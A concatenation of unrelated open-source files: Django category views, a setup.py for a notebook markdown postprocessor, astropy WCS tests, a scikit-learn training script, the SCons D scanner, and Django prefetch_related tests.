self.breadcrumb = [HOME_BREAD,{'text': _('Category')},get_add_icon('/category/new/',_('Create a new category'))]
super(CategoryListView, self).__init__(*args, **kwargs)
def get(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
return super(CategoryListView, self).get(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(CategoryListView, self).get_context_data(**kwargs)
context['category_list_html'] = get_category_list_html()
context['head_title_text'] = _('Category List')
context['breadcrumb'] = self.breadcrumb
return context
def delete_category(request, pk):
cate = category.objects.get(pk=pk)
if not check_login(request) or request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % request.get_full_path())
cate.delete()
message_body = "The category %s has been deleted" % cate.name
messages.success(request, message_body)
return HttpResponse('')
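# Illustrative sketch (not part of the original app): a urls.py wiring these views
# might look roughly like the following; the module path and URL patterns are
# assumptions inferred from the redirects used above ("/category/new/",
# "/category/list/"), not the project's actual routing.
#
#     from django.conf.urls import url
#     from easydata.category.views import (
#         CategoryPostView, CategoryListView, delete_category,
#     )
#
#     urlpatterns = [
#         url(r'^category/new/$', CategoryPostView.as_view()),
#         url(r'^category/edit/(?P<pk>\d+)/$', CategoryPostView.as_view()),
#         url(r'^category/list/$', CategoryListView.as_view()),
#         url(r'^category/delete/(?P<pk>\d+)/$', delete_category),
#     ]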
|
the-stack_106_12978
|
"""
nbconvert_md_processing
Postprocessing of markdown files resulting from
"""
import sys
from setuptools import setup, find_packages
import versioneer
short_description = ("Postprocessing of markdown files resulting from jupyter nbconvert"
" to be uploaded to github (gists).")
# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
try:
with open("README.md", "r") as handle:
long_description = handle.read()
except Exception:
long_description = None
setup(
# Self-descriptive entries which should always be present
name='nbconvert_md_processing',
author='enryh',
author_email='[email protected]',
description=short_description,
long_description=long_description,
long_description_content_type="text/markdown",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license='MIT',
# Which Python importable modules should be included when your package is installed
# Handled automatically by setuptools. Use 'exclude' to prevent some specific
# subpackage(s) from being added, if needed
packages=find_packages(),
# Optional include package data to ship with your package
# Customize MANIFEST.in if the general case does not suit your needs
# Comment out this line to prevent the files from being packaged with your software
include_package_data=True,
# Allows `setup.py test` to work correctly with pytest
setup_requires=[] + pytest_runner,
# Entry point
entry_points = {
'console_scripts': ['nbconvert_md_processing=nbconvert_md_processing.nbconvert_md_processing:main'],
},
    # Additional entries you may want: simply uncomment the lines you want and fill in the data
# url='http://www.my_package.com', # Website
# install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
# platforms=['Linux',
# 'Mac OS-X',
# 'Unix',
# 'Windows'], # Valid platforms your code works on, adjust to your flavor
python_requires=">=3.8", # Python version restrictions
# Manual control if final package is compressible or not, set False to prevent the .egg from being made
# zip_safe=False,
)
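# Editorial note (not part of the original file): the console_scripts entry point
# above means that installing this package (e.g. "pip install .") puts a
# `nbconvert_md_processing` command on PATH which simply calls main() in
# nbconvert_md_processing/nbconvert_md_processing.py; its command-line interface is
# defined there, not in this setup script.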
|
the-stack_106_12981
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from copy import deepcopy
import numpy as np
import pytest
from astropy import units as u
from astropy.coordinates import FK5, Galactic, SkyCoord
from astropy.wcs import WCS
from astropy.wcs.utils import pixel_to_skycoord, skycoord_to_pixel
from numpy.testing import assert_allclose, assert_equal
from ..wcs_helpers import find_optimal_celestial_wcs
try:
import shapely # noqa
except ImportError:
SHAPELY_INSTALLED = False
else:
SHAPELY_INSTALLED = True
class TestOptimalWCS():
def setup_method(self, method):
self.wcs = WCS(naxis=2)
self.wcs.wcs.ctype = 'RA---TAN', 'DEC--TAN'
self.wcs.wcs.crpix = 10, 15
self.wcs.wcs.crval = 43, 23
self.wcs.wcs.cdelt = -0.1, 0.1
self.wcs.wcs.equinox = 2000.
self.array = np.ones((30, 40))
def test_identity(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame=FK5())
assert tuple(wcs.wcs.ctype) == ('RA---TAN', 'DEC--TAN')
assert_allclose(wcs.wcs.crval, (43, 23))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert wcs.wcs.equinox == 2000
assert wcs.wcs.radesys == 'FK5'
assert_allclose(wcs.wcs.crpix, (10, 15))
assert shape == (30, 40)
def test_args_tuple_wcs(self):
wcs, shape = find_optimal_celestial_wcs([(self.array.shape, self.wcs)], frame=FK5())
def test_args_tuple_header(self):
wcs, shape = find_optimal_celestial_wcs([(self.array.shape, self.wcs.to_header())],
frame=FK5())
def test_frame_projection(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame=Galactic(),
projection='CAR')
assert tuple(wcs.wcs.ctype) == ('GLON-CAR', 'GLAT-CAR')
c = SkyCoord(43, 23, unit=('deg', 'deg'), frame='fk5').galactic
assert_allclose(wcs.wcs.crval, (c.l.degree, c.b.degree))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert np.isnan(wcs.wcs.equinox)
assert wcs.wcs.radesys == ''
# The following values are empirical and just to make sure there are no regressions
assert_allclose(wcs.wcs.crpix, (16.21218937, 28.86119519))
assert shape == (47, 50)
def test_frame_str(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], frame='galactic')
assert tuple(wcs.wcs.ctype) == ('GLON-TAN', 'GLAT-TAN')
def test_resolution(self):
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], resolution=3 * u.arcmin)
assert_allclose(wcs.wcs.cdelt, (-0.05, 0.05))
@pytest.mark.skipif('not SHAPELY_INSTALLED')
def test_auto_rotate(self):
# To test auto_rotate, we set the frame to Galactic and the final image
# should have the same size as the input image. In this case, the image
# actually gets rotated 90 degrees, so the values aren't quite the same
# as the input, but they are round values.
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)],
frame=Galactic(), auto_rotate=True)
assert tuple(wcs.wcs.ctype) == ('GLON-TAN', 'GLAT-TAN')
c = SkyCoord(43, 23, unit=('deg', 'deg'), frame='fk5').galactic
assert_allclose(wcs.wcs.crval, (c.l.degree, c.b.degree))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert np.isnan(wcs.wcs.equinox)
assert wcs.wcs.radesys == ''
assert_allclose(wcs.wcs.crpix, (10, 15))
assert shape == (30, 40)
@pytest.mark.skipif('not SHAPELY_INSTALLED')
@pytest.mark.parametrize('angle', np.linspace(0, 360, 13))
def test_auto_rotate_systematic(self, angle):
# This is a test to make sure for a number of angles that the corners
# of the image are inside the final WCS but the next pixels outwards are
# not. We test the full 360 range of angles.
angle = np.radians(angle)
pc = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
self.wcs.wcs.pc = pc
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)], auto_rotate=True)
ny, nx = self.array.shape
xp = np.array([0, 0, nx - 1, nx - 1, -1, -1, nx, nx])
yp = np.array([0, ny - 1, ny - 1, 0, -1, ny, ny, -1])
c = pixel_to_skycoord(xp, yp, self.wcs, origin=0)
xp_final, yp_final = skycoord_to_pixel(c, wcs, origin=0)
ny_final, nx_final = shape
inside = ((xp_final >= -0.5) & (xp_final <= nx_final - 0.5) &
(yp_final >= -0.5) & (yp_final <= ny_final - 0.5))
assert_equal(inside, [1, 1, 1, 1, 0, 0, 0, 0])
def test_multiple_size(self):
wcs1 = self.wcs
wcs2 = deepcopy(self.wcs)
wcs2.wcs.crpix[0] += 10
wcs3 = deepcopy(self.wcs)
wcs3.wcs.crpix[1] -= 5
input_data = [(self.array, wcs1), (self.array, wcs2), (self.array, wcs3)]
wcs, shape = find_optimal_celestial_wcs(input_data, frame=FK5())
assert tuple(wcs.wcs.ctype) == ('RA---TAN', 'DEC--TAN')
assert_allclose(wcs.wcs.crval, (43, 23))
assert_allclose(wcs.wcs.cdelt, (-0.1, 0.1))
assert wcs.wcs.equinox == 2000
assert wcs.wcs.radesys == 'FK5'
assert_allclose(wcs.wcs.crpix, (20, 15))
assert shape == (35, 50)
def test_multiple_resolution(self):
wcs1 = self.wcs
wcs2 = deepcopy(self.wcs)
wcs2.wcs.cdelt = -0.01, 0.02
wcs3 = deepcopy(self.wcs)
wcs3.wcs.crpix = -0.2, 0.3
input_data = [(self.array, wcs1), (self.array, wcs2), (self.array, wcs3)]
wcs, shape = find_optimal_celestial_wcs(input_data)
assert_allclose(wcs.wcs.cdelt, (-0.01, 0.01))
def test_invalid_array_shape(self):
array = np.ones((30, 20, 10))
with pytest.raises(ValueError) as exc:
wcs, shape = find_optimal_celestial_wcs([(array, self.wcs)])
assert exc.value.args[0] == 'Input data is not 2-dimensional (got shape (30, 20, 10))'
def test_invalid_wcs_shape(self):
wcs = WCS(naxis=3)
wcs.wcs.ctype = 'RA---TAN', 'DEC--TAN', 'VELO-LSR'
wcs.wcs.set()
with pytest.raises(ValueError) as exc:
wcs, shape = find_optimal_celestial_wcs([(self.array, wcs)])
assert exc.value.args[0] == 'Input WCS is not 2-dimensional'
def test_invalid_not_celestial(self):
self.wcs.wcs.ctype = 'OFFSETX', 'OFFSETY'
with pytest.raises(TypeError) as exc:
wcs, shape = find_optimal_celestial_wcs([(self.array, self.wcs)])
assert exc.value.args[0] == 'WCS does not have celestial components'
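# Standalone usage sketch (an editorial illustration, not one of the test cases
# above; the public import path below is an assumption):
#
#     import numpy as np
#     from astropy.wcs import WCS
#     from reproject.mosaicking import find_optimal_celestial_wcs
#
#     wcs_in = WCS(naxis=2)
#     wcs_in.wcs.ctype = 'RA---TAN', 'DEC--TAN'
#     wcs_in.wcs.crpix = 10, 15
#     wcs_in.wcs.crval = 43, 23
#     wcs_in.wcs.cdelt = -0.1, 0.1
#     data = np.ones((30, 40))
#
#     wcs_out, shape_out = find_optimal_celestial_wcs([(data, wcs_in)])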
|
the-stack_106_12986
|
# %%
import pickle
# %%
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
# %% tags=["parameters"]
upstream = ['features']
product = None
model_type = 'random-forest'
n_estimators = None
criterion = None
learning_rate = None
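# Example parameter sets (illustrative assumptions; in practice these values are
# injected into the "parameters" cell above by the surrounding pipeline):
#
#     model_type = 'random-forest'; n_estimators = 100; criterion = 'gini'
#     model_type = 'ada-boost'; n_estimators = 50; learning_rate = 1.0
#
# Parameters not used by the selected model can be left as None.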
# %%
df = pd.read_csv(str(upstream['features']))
X = df.drop('target', axis='columns')
y = df.target
# %%
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.33,
random_state=42)
# %%
if model_type == 'random-forest':
clf = RandomForestClassifier(n_estimators=n_estimators,
criterion=criterion)
elif model_type == 'ada-boost':
clf = AdaBoostClassifier(n_estimators=n_estimators,
learning_rate=learning_rate)
else:
raise ValueError(f'Unsupported model type: {model_type!r}')
# %%
clf.fit(X_train, y_train)
# %%
y_pred = clf.predict(X_test)
# %%
print(classification_report(y_test, y_pred))
# %%
with open(product['model'], 'wb') as f:
pickle.dump(clf, f)
|
the-stack_106_12989
|
"""SCons.Scanner.D
Scanner for the Digital Mars "D" programming language.
Coded by Andy Friesen
17 Nov 2003
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Scanner/D.py 5023 2010/06/14 22:05:46 scons"
import re
import SCons.Node.FS
import SCons.Scanner
def DScanner():
"""Return a prototype Scanner instance for scanning D source files"""
ds = D()
return ds
class D(SCons.Scanner.Classic):
def __init__ (self):
SCons.Scanner.Classic.__init__ (self,
name = "DScanner",
suffixes = '$DSUFFIXES',
path_variable = 'DPATH',
                                        regex = r'import\s+(?:[a-zA-Z0-9_.]+)\s*(?:,\s*(?:[a-zA-Z0-9_.]+)\s*)*;')
        self.cre2 = re.compile (r'(?:import\s)?\s*([a-zA-Z0-9_.]+)\s*(?:,|;)', re.M)
def find_include(self, include, source_dir, path):
# translate dots (package separators) to slashes
inc = include.replace('.', '/')
i = SCons.Node.FS.find_file(inc + '.d', (source_dir,) + path)
if i is None:
i = SCons.Node.FS.find_file (inc + '.di', (source_dir,) + path)
return i, include
def find_include_names(self, node):
includes = []
for i in self.cre.findall(node.get_text_contents()):
includes = includes + self.cre2.findall(i)
return includes
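# Worked example (editorial sketch, not part of the original scanner): for a D source
# line such as
#
#     import std.stdio, std.string;
#
# the class-level regex matches the whole import statement, cre2 then extracts
# ['std.stdio', 'std.string'], and find_include() looks for 'std/stdio.d' (falling
# back to 'std/stdio.di') in the source directory and the directories listed in DPATH.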
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_12990
|
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import connection
from django.db.models import Prefetch, QuerySet
from django.db.models.query import get_prefetcher, prefetch_related_objects
from django.test import TestCase, override_settings
from django.test.utils import CaptureQueriesContext
from .models import (
Author, Author2, AuthorAddress, AuthorWithAge, Bio, Book, Bookmark,
BookReview, BookWithYear, Comment, Department, Employee, FavoriteAuthors,
House, LessonEntry, ModelIterableSubclass, Person, Qualification, Reader,
Room, TaggedItem, Teacher, WordEntry,
)
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.book1 = Book.objects.create(title='Poems')
cls.book2 = Book.objects.create(title='Jane Eyre')
cls.book3 = Book.objects.create(title='Wuthering Heights')
cls.book4 = Book.objects.create(title='Sense and Sensibility')
cls.author1 = Author.objects.create(name='Charlotte', first_book=cls.book1)
cls.author2 = Author.objects.create(name='Anne', first_book=cls.book1)
cls.author3 = Author.objects.create(name='Emily', first_book=cls.book1)
cls.author4 = Author.objects.create(name='Jane', first_book=cls.book4)
cls.book1.authors.add(cls.author1, cls.author2, cls.author3)
cls.book2.authors.add(cls.author1)
cls.book3.authors.add(cls.author3)
cls.book4.authors.add(cls.author4)
cls.reader1 = Reader.objects.create(name='Amy')
cls.reader2 = Reader.objects.create(name='Belinda')
cls.reader1.books_read.add(cls.book1, cls.book4)
cls.reader2.books_read.add(cls.book2, cls.book4)
class PrefetchRelatedTests(TestDataMixin, TestCase):
def assertWhereContains(self, sql, needle):
where_idx = sql.index('WHERE')
self.assertEqual(
sql.count(str(needle), where_idx), 1,
msg="WHERE clause doesn't contain %s, actual SQL: %s" % (needle, sql[where_idx:])
)
def test_m2m_forward(self):
with self.assertNumQueries(2):
lists = [list(b.authors.all()) for b in Book.objects.prefetch_related('authors')]
normal_lists = [list(b.authors.all()) for b in Book.objects.all()]
self.assertEqual(lists, normal_lists)
def test_m2m_reverse(self):
with self.assertNumQueries(2):
lists = [list(a.books.all()) for a in Author.objects.prefetch_related('books')]
normal_lists = [list(a.books.all()) for a in Author.objects.all()]
self.assertEqual(lists, normal_lists)
def test_foreignkey_forward(self):
with self.assertNumQueries(2):
books = [a.first_book for a in Author.objects.prefetch_related('first_book')]
normal_books = [a.first_book for a in Author.objects.all()]
self.assertEqual(books, normal_books)
def test_foreignkey_reverse(self):
with self.assertNumQueries(2):
[list(b.first_time_authors.all())
for b in Book.objects.prefetch_related('first_time_authors')]
self.assertQuerysetEqual(self.book2.authors.all(), ["<Author: Charlotte>"])
def test_onetoone_reverse_no_match(self):
# Regression for #17439
with self.assertNumQueries(2):
book = Book.objects.prefetch_related('bookwithyear').all()[0]
with self.assertNumQueries(0):
with self.assertRaises(BookWithYear.DoesNotExist):
book.bookwithyear
def test_onetoone_reverse_with_to_field_pk(self):
"""
A model (Bio) with a OneToOneField primary key (author) that references
a non-pk field (name) on the related model (Author) is prefetchable.
"""
Bio.objects.bulk_create([
Bio(author=self.author1),
Bio(author=self.author2),
Bio(author=self.author3),
])
authors = Author.objects.filter(
name__in=[self.author1, self.author2, self.author3],
).prefetch_related('bio')
with self.assertNumQueries(2):
for author in authors:
self.assertEqual(author.name, author.bio.author.name)
def test_survives_clone(self):
with self.assertNumQueries(2):
[list(b.first_time_authors.all())
for b in Book.objects.prefetch_related('first_time_authors').exclude(id=1000)]
def test_len(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
len(qs)
[list(b.first_time_authors.all()) for b in qs]
def test_bool(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
bool(qs)
[list(b.first_time_authors.all()) for b in qs]
def test_count(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
[b.first_time_authors.count() for b in qs]
def test_exists(self):
with self.assertNumQueries(2):
qs = Book.objects.prefetch_related('first_time_authors')
[b.first_time_authors.exists() for b in qs]
def test_in_and_prefetch_related(self):
"""
Regression test for #20242 - QuerySet "in" didn't work the first time
when using prefetch_related. This was fixed by the removal of chunked
reads from QuerySet iteration in
70679243d1786e03557c28929f9762a119e3ac14.
"""
qs = Book.objects.prefetch_related('first_time_authors')
self.assertIn(qs[0], qs)
def test_clear(self):
with self.assertNumQueries(5):
with_prefetch = Author.objects.prefetch_related('books')
without_prefetch = with_prefetch.prefetch_related(None)
[list(a.books.all()) for a in without_prefetch]
def test_m2m_then_m2m(self):
"""A m2m can be followed through another m2m."""
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books__read_by')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
def test_overriding_prefetch(self):
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books', 'books__read_by')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
with self.assertNumQueries(3):
qs = Author.objects.prefetch_related('books__read_by', 'books')
lists = [[[str(r) for r in b.read_by.all()]
for b in a.books.all()]
for a in qs]
self.assertEqual(lists, [
[["Amy"], ["Belinda"]], # Charlotte - Poems, Jane Eyre
[["Amy"]], # Anne - Poems
[["Amy"], []], # Emily - Poems, Wuthering Heights
[["Amy", "Belinda"]], # Jane - Sense and Sense
])
def test_get(self):
"""
Objects retrieved with .get() get the prefetch behavior.
"""
# Need a double
with self.assertNumQueries(3):
author = Author.objects.prefetch_related('books__read_by').get(name="Charlotte")
lists = [[str(r) for r in b.read_by.all()] for b in author.books.all()]
self.assertEqual(lists, [["Amy"], ["Belinda"]]) # Poems, Jane Eyre
def test_foreign_key_then_m2m(self):
"""
A m2m relation can be followed after a relation like ForeignKey that
doesn't have many objects.
"""
with self.assertNumQueries(2):
qs = Author.objects.select_related('first_book').prefetch_related('first_book__read_by')
lists = [[str(r) for r in a.first_book.read_by.all()]
for a in qs]
self.assertEqual(lists, [["Amy"], ["Amy"], ["Amy"], ["Amy", "Belinda"]])
def test_reverse_one_to_one_then_m2m(self):
"""
        A m2m relation can be followed after going through the select_related
reverse of an o2o.
"""
qs = Author.objects.prefetch_related('bio__books').select_related('bio')
with self.assertNumQueries(1):
list(qs.all())
Bio.objects.create(author=self.author1)
with self.assertNumQueries(2):
list(qs.all())
def test_attribute_error(self):
qs = Reader.objects.all().prefetch_related('books_read__xyz')
msg = (
"Cannot find 'xyz' on Book object, 'books_read__xyz' "
"is an invalid parameter to prefetch_related()"
)
with self.assertRaisesMessage(AttributeError, msg) as cm:
list(qs)
self.assertIn('prefetch_related', str(cm.exception))
def test_invalid_final_lookup(self):
qs = Book.objects.prefetch_related('authors__name')
msg = (
"'authors__name' does not resolve to an item that supports "
"prefetching - this is an invalid parameter to prefetch_related()."
)
with self.assertRaisesMessage(ValueError, msg) as cm:
list(qs)
self.assertIn('prefetch_related', str(cm.exception))
self.assertIn("name", str(cm.exception))
def test_forward_m2m_to_attr_conflict(self):
msg = 'to_attr=authors conflicts with a field on the Book model.'
authors = Author.objects.all()
with self.assertRaisesMessage(ValueError, msg):
list(Book.objects.prefetch_related(
Prefetch('authors', queryset=authors, to_attr='authors'),
))
# Without the ValueError, an author was deleted due to the implicit
# save of the relation assignment.
self.assertEqual(self.book1.authors.count(), 3)
def test_reverse_m2m_to_attr_conflict(self):
msg = 'to_attr=books conflicts with a field on the Author model.'
poems = Book.objects.filter(title='Poems')
with self.assertRaisesMessage(ValueError, msg):
list(Author.objects.prefetch_related(
Prefetch('books', queryset=poems, to_attr='books'),
))
# Without the ValueError, a book was deleted due to the implicit
# save of reverse relation assignment.
self.assertEqual(self.author1.books.count(), 2)
def test_m2m_then_reverse_fk_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__addresses'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.name)
def test_m2m_then_m2m_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__favorite_authors'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.name)
def test_m2m_then_reverse_one_to_one_object_ids(self):
with CaptureQueriesContext(connection) as queries:
list(Book.objects.prefetch_related('authors__authorwithage'))
sql = queries[-1]['sql']
self.assertWhereContains(sql, self.author1.id)
class RawQuerySetTests(TestDataMixin, TestCase):
def test_basic(self):
with self.assertNumQueries(2):
books = Book.objects.raw(
"SELECT * FROM prefetch_related_book WHERE id = %s",
(self.book1.id,)
).prefetch_related('authors')
book1 = list(books)[0]
with self.assertNumQueries(0):
self.assertCountEqual(book1.authors.all(), [self.author1, self.author2, self.author3])
def test_prefetch_before_raw(self):
with self.assertNumQueries(2):
books = Book.objects.prefetch_related('authors').raw(
"SELECT * FROM prefetch_related_book WHERE id = %s",
(self.book1.id,)
)
book1 = list(books)[0]
with self.assertNumQueries(0):
self.assertCountEqual(book1.authors.all(), [self.author1, self.author2, self.author3])
def test_clear(self):
with self.assertNumQueries(5):
with_prefetch = Author.objects.raw(
"SELECT * FROM prefetch_related_author"
).prefetch_related('books')
without_prefetch = with_prefetch.prefetch_related(None)
[list(a.books.all()) for a in without_prefetch]
class CustomPrefetchTests(TestCase):
@classmethod
def traverse_qs(cls, obj_iter, path):
"""
        Helper method that walks obj_iter and, for each object, recursively follows
        the attribute names given in path; it returns a list of
        (object, related_objects) pairs collected along the way.
"""
ret_val = []
if hasattr(obj_iter, 'all'):
obj_iter = obj_iter.all()
try:
iter(obj_iter)
except TypeError:
obj_iter = [obj_iter]
for obj in obj_iter:
rel_objs = []
for part in path:
if not part:
continue
try:
related = getattr(obj, part[0])
except ObjectDoesNotExist:
continue
if related is not None:
rel_objs.extend(cls.traverse_qs(related, [part[1:]]))
ret_val.append((obj, rel_objs))
return ret_val
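    # For example (editorial illustration): traverse_qs(person_qs, [['houses', 'rooms']])
    # returns entries of the form (person, [(house, [(room, []), ...]), ...]) -- each
    # object paired with the objects found by following the attribute path.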
@classmethod
def setUpTestData(cls):
cls.person1 = Person.objects.create(name='Joe')
cls.person2 = Person.objects.create(name='Mary')
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
cls.house1 = House.objects.create(name='House 1', address='123 Main St', owner=cls.person1)
cls.room1_1 = Room.objects.create(name='Dining room', house=cls.house1)
cls.room1_2 = Room.objects.create(name='Lounge', house=cls.house1)
cls.room1_3 = Room.objects.create(name='Kitchen', house=cls.house1)
cls.house1.main_room = cls.room1_1
cls.house1.save()
cls.person1.houses.add(cls.house1)
cls.house2 = House.objects.create(name='House 2', address='45 Side St', owner=cls.person1)
cls.room2_1 = Room.objects.create(name='Dining room', house=cls.house2)
cls.room2_2 = Room.objects.create(name='Lounge', house=cls.house2)
cls.room2_3 = Room.objects.create(name='Kitchen', house=cls.house2)
cls.house2.main_room = cls.room2_1
cls.house2.save()
cls.person1.houses.add(cls.house2)
cls.house3 = House.objects.create(name='House 3', address='6 Downing St', owner=cls.person2)
cls.room3_1 = Room.objects.create(name='Dining room', house=cls.house3)
cls.room3_2 = Room.objects.create(name='Lounge', house=cls.house3)
cls.room3_3 = Room.objects.create(name='Kitchen', house=cls.house3)
cls.house3.main_room = cls.room3_1
cls.house3.save()
cls.person2.houses.add(cls.house3)
cls.house4 = House.objects.create(name='house 4', address="7 Regents St", owner=cls.person2)
cls.room4_1 = Room.objects.create(name='Dining room', house=cls.house4)
cls.room4_2 = Room.objects.create(name='Lounge', house=cls.house4)
cls.room4_3 = Room.objects.create(name='Kitchen', house=cls.house4)
cls.house4.main_room = cls.room4_1
cls.house4.save()
cls.person2.houses.add(cls.house4)
def test_traverse_qs(self):
qs = Person.objects.prefetch_related('houses')
related_objs_normal = [list(p.houses.all()) for p in qs],
related_objs_from_traverse = [[inner[0] for inner in o[1]]
for o in self.traverse_qs(qs, [['houses']])]
self.assertEqual(related_objs_normal, (related_objs_from_traverse,))
def test_ambiguous(self):
# Ambiguous: Lookup was already seen with a different queryset.
msg = (
"'houses' lookup was already seen with a different queryset. You "
"may need to adjust the ordering of your lookups."
)
with self.assertRaisesMessage(ValueError, msg):
self.traverse_qs(
Person.objects.prefetch_related('houses__rooms', Prefetch('houses', queryset=House.objects.all())),
[['houses', 'rooms']]
)
# Ambiguous: Lookup houses_lst doesn't yet exist when performing houses_lst__rooms.
msg = (
"Cannot find 'houses_lst' on Person object, 'houses_lst__rooms' is "
"an invalid parameter to prefetch_related()"
)
with self.assertRaisesMessage(AttributeError, msg):
self.traverse_qs(
Person.objects.prefetch_related(
'houses_lst__rooms',
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')
),
[['houses', 'rooms']]
)
# Not ambiguous.
self.traverse_qs(
Person.objects.prefetch_related('houses__rooms', 'houses'),
[['houses', 'rooms']]
)
self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')
),
[['houses', 'rooms']]
)
def test_m2m(self):
# Control lookups.
with self.assertNumQueries(2):
lst1 = self.traverse_qs(
Person.objects.prefetch_related('houses'),
[['houses']]
)
# Test lookups.
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses')),
[['houses']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses', to_attr='houses_lst')),
[['houses_lst']]
)
self.assertEqual(lst1, lst2)
def test_reverse_m2m(self):
# Control lookups.
with self.assertNumQueries(2):
lst1 = self.traverse_qs(
House.objects.prefetch_related('occupants'),
[['occupants']]
)
# Test lookups.
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
House.objects.prefetch_related(Prefetch('occupants')),
[['occupants']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
lst2 = self.traverse_qs(
House.objects.prefetch_related(Prefetch('occupants', to_attr='occupants_lst')),
[['occupants_lst']]
)
self.assertEqual(lst1, lst2)
def test_m2m_through_fk(self):
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
Room.objects.prefetch_related('house__occupants'),
[['house', 'occupants']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Room.objects.prefetch_related(Prefetch('house__occupants')),
[['house', 'occupants']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Room.objects.prefetch_related(Prefetch('house__occupants', to_attr='occupants_lst')),
[['house', 'occupants_lst']]
)
self.assertEqual(lst1, lst2)
def test_m2m_through_gfk(self):
TaggedItem.objects.create(tag="houses", content_object=self.house1)
TaggedItem.objects.create(tag="houses", content_object=self.house2)
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
TaggedItem.objects.filter(tag='houses').prefetch_related('content_object__rooms'),
[['content_object', 'rooms']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
TaggedItem.objects.prefetch_related(
Prefetch('content_object'),
Prefetch('content_object__rooms', to_attr='rooms_lst')
),
[['content_object', 'rooms_lst']]
)
self.assertEqual(lst1, lst2)
def test_o2m_through_m2m(self):
# Control lookups.
with self.assertNumQueries(3):
lst1 = self.traverse_qs(
Person.objects.prefetch_related('houses', 'houses__rooms'),
[['houses', 'rooms']]
)
# Test lookups.
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses'), 'houses__rooms'),
[['houses', 'rooms']]
)
